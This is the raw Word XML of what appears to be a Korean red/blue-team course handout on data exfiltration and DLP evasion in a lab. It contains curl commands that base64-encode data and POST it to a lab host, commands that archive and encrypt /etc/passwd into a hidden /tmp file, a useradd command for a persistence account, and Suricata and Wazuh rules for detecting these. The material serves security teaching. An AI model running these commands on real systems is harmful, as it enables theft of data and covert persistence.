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W10] 데이터 유출 — 다채널 exfil vs DLP·유출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10주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>데이터 유출(Exfiltration)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 민감 데이터를 수집·암호화해 HTTP/DNS/ICMP/스테가노그래피/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>분할 전송 등 다채널로 빼낸다. Red 는 유출을 시도하고, Blue 는 DNS 터널·대용량 업로드를 탐지하고 DLP 우회를 막는다.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민감 파일을 모아 암호화 아카이브(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa10exfil`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)로 스테이징하고, 태그 단 HTTP/DNS 채널로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">유출을 시도한다(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa10r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). 방어자는 유출 채널을 탐지하고 DLP 우회 기법을 분석한다.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유출(자기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인프라에서 유출,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유출 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`aa10r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 암호화 스테이징 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa10exfil`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aa10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`atka10`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9710011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103101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[HTTP/DNS 유출 시도] — 인코딩 데이터 반출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수집 데이터를 Base64 인코딩해 HTTP POST(또는 DNS 서브도메인)로 빼낸다. 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa10r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 달아</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>유출 시도가 대상 audit 에 귀속되게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DATA=$(echo 'secret-data aa10r1-kim' | base64)</w:t>
        <w:br/>
        <w:t>curl -s -A "aa10r1-kim-exfil" -H "Host: dvwa.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --data "x=$DATA" "http://192.168.0.161/upload?tag=aa10r1-kim"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aa10r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 포함된 유출 시도가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aa10r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그가 포함된 유출 시도가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[스테이징·암호화] — 반출 아카이브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유출 전 단계로 민감 데이터를 모아 암호화 아카이브 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa10exfil`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aa10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)로 스테이징하고, 계정</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka10`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 으로 지속 접근을 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tar czf - /etc/passwd /etc/hostname 2&gt;/dev/null | openssl enc -aes-256-cbc -pbkdf2 -k aa10key -out /tmp/.aa10exfil 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>echo 'aa10 staged' &gt;&gt; /tmp/.aa10exfil</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka10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/tmp/.aa10exfil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aa10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atka10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/tmp/.aa10exfil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aa10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atka10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[유출 채널 탐지] — Suricata 룰 (sid 9710011)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DNS 터널/대용량 업로드 등 유출 채널을 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9710011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(msg:"ATKADV-W10 data exfil over HTTP (base64 blob)"; flow:to_server; http.request_body; content:"base64"; nocase; sid:9710011; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(DNS 터널 탐지는 긴 서브도메인/높은 TXT 빈도를 별도 룰로 보완.)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9710011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유출 채널을 보는 sid 9710011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[스테이징 탐지] — Wazuh 룰 (id 103101)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스테이징 아카이브·계정 생성을 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103101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name="edu,exfil,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103101" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;atka10&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W10 - exfil staging archive / account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103101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스테이징/계정 지표를 보는 id 103101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[DLP 우회 분석·방어] — 채널 비교 + 유출 방어 전략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유출 채널별 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>대역폭 vs 은닉성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 트레이드오프와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DLP 우회</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 기법을 분석하고, 유출 방어 전략(egress 필터링/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNS 모니터링/DLP/데이터 분류)을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채널별(HTTP/DNS/ICMP/스테가노/분할) 대역폭·은닉성 비교 + DLP 우회 기법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유출 방어 전략 + 스테이징(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa10exfil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(atka10)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DLP 우회 분석·방어 전략으로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채널 비교·DLP 우회·방어 전략·헌팅은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